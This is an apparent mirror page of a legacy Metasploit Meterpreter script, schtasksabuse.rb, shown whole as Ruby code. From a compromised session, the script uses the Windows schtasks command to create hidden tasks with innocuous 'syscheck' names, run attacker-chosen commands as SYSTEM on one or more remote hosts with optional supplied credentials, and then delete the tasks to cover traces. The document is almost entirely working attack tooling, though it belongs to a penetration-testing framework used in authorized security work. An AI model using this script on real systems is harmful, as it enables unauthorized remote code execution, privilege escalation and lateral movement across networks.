Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

schtasksabuse.rb 5.9KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #Meterpreter script for abusing the scheduler service in windows
  7. #by scheduling and running a list of command against one or more targets
  8. #using schtasks command to run them as system. This script works with Windows XP,
  9. #Windows 2003, Windows Vista and Windows 2008.
  10. #Verion: 0.1.1
  11. #Note: in Vista UAC must be disabled to be able to perform scheduling
  12. #and the meterpreter must be running under the profile of local admin
  13. #or system.
  14. ################## Variable Declarations ##################
  15. session = client
  16. # Setting Arguments
  17. @@exec_opts = Rex::Parser::Arguments.new(
  18. "-h" => [ false,"Help menu." ],
  19. "-c" => [ true,"Commands to execute. Several commands can be given but separated by commas and enclose the list in double quotes if arguments are used."],
  20. "-u" => [ true,"Username to schedule task, if none is given the current user credentials will be used."],
  21. "-p" => [ true,"Password for user account specified, it must be given if a user is given."],
  22. "-d" => [ true,"Delay between the execution of commands in seconds, default is 2 seconds if not given."],
  23. "-t" => [ true,"Remote system to schedule job."],
  24. "-l" => [ true,"Text file with list of targets, one per line."],
  25. "-s" => [ true,"Text file with list of commands, one per line."]
  26. )
  27. #Setting Argument variables
  28. commands = []
  29. targets = []
  30. username = nil
  31. password = nil
  32. delay = 2
  33. help = 0
  34. def usage
  35. print_status( "This Meterpreter script is for running commands on targets system using the")
  36. print_status( "Windows Scheduler, it is based on the tool presented but not released by Val Smith")
  37. print_status( "in Defcon 16 ATAbuser. If no user and password is given it will use the permissions")
  38. print_status( "of the process Meterpreter is running under.")
  39. print_status( "Options:")
  40. print_status( @@exec_opts.usage )
  41. end
  42. def abuse(session,targets,commands,username,password,delay)
  43. #for each target
  44. targets.each do |t|
  45. next if t.strip.length < 1
  46. next if t[0,1] == "#"
  47. #for eacg command
  48. commands.each do |c|
  49. next if c.strip.length < 1
  50. next if c[0,1] == "#"
  51. taskname = "syscheck#{rand(100)}"
  52. success = false
  53. #check if user name and password where given, if not credential of running process used
  54. if username == nil && password == nil
  55. print_status("Scheduling command #{c} to run .....")
  56. execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /st 00:00:00"
  57. r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})
  58. #check if successfully scheduled
  59. while(d = r.channel.read)
  60. if d =~ /successfully been created/
  61. print_status("The scheduled task has been successfully created")
  62. success = true
  63. end
  64. end
  65. #check if schedule successful, if not raise error
  66. if !success
  67. print_status("Failed to create scheduled task!!")
  68. raise "Command could not be Scheduled"
  69. elsif success
  70. print_status("Running command on #{t}")
  71. session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t}")
  72. end
  73. r.channel.close
  74. r.close
  75. #Wait before scheduling next command
  76. sleep(delay)
  77. print_status("Removing scheduled task")
  78. session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /F")
  79. else
  80. print_status("Scheduling command #{c} to run .....")
  81. execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /u #{username} /p #{password} /st 00:00:00"
  82. r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})
  83. #check if successfully scheduled
  84. while(d = r.channel.read)
  85. if d =~ /successfully been created/
  86. print_status("The scheduled task has been successfully created")
  87. success = true
  88. end
  89. end
  90. #check if schedule successful, if not raise error
  91. if !success
  92. print_status("Failed to create scheduled task!!")
  93. raise "Command could not be Scheduled"
  94. elsif success
  95. print_status("Running command on #{t}")
  96. session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t} /u #{username} /p #{password}")
  97. end
  98. r.channel.close
  99. r.close
  100. #Wait before scheduling next command
  101. sleep(delay)
  102. print_status("Removing scheduled task")
  103. session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /u #{username} /p #{password} /F")
  104. end
  105. end
  106. end
  107. end
  108. #check for proper Meterpreter Platform
  109. def unsupported
  110. print_error("This version of Meterpreter is not supported with this Script!")
  111. raise Rex::Script::Completed
  112. end
  113. @@exec_opts.parse(args) { |opt, idx, val|
  114. case opt
  115. when "-c"
  116. commands = val.split(',')
  117. when "-u"
  118. username = val
  119. when "-p"
  120. password = val
  121. when "-t"
  122. targets = val.split(',')
  123. when "-d"
  124. delay = val.to_i
  125. when "-s"
  126. script = val
  127. if not ::File.exist?(script)
  128. raise "Command List File does not exists!"
  129. else
  130. ::File.open(script, "r").each_line do |line|
  131. commands << line.chomp
  132. end
  133. end
  134. when "-l"
  135. list = val
  136. if not ::File.exist?(list)
  137. raise "Command List File does not exists!"
  138. else
  139. ::File.open(list, "r").each_line do |line|
  140. targets << line.chomp
  141. end
  142. end
  143. when "-h"
  144. help = 1
  145. end
  146. }
  147. unsupported if client.platform != 'windows'
  148. print_status("Meterpreter session running as #{session.sys.config.getuid}")
  149. if help == 0 && commands.length != 0
  150. abuse(session,targets,commands,username,password,delay)
  151. else
  152. usage
  153. end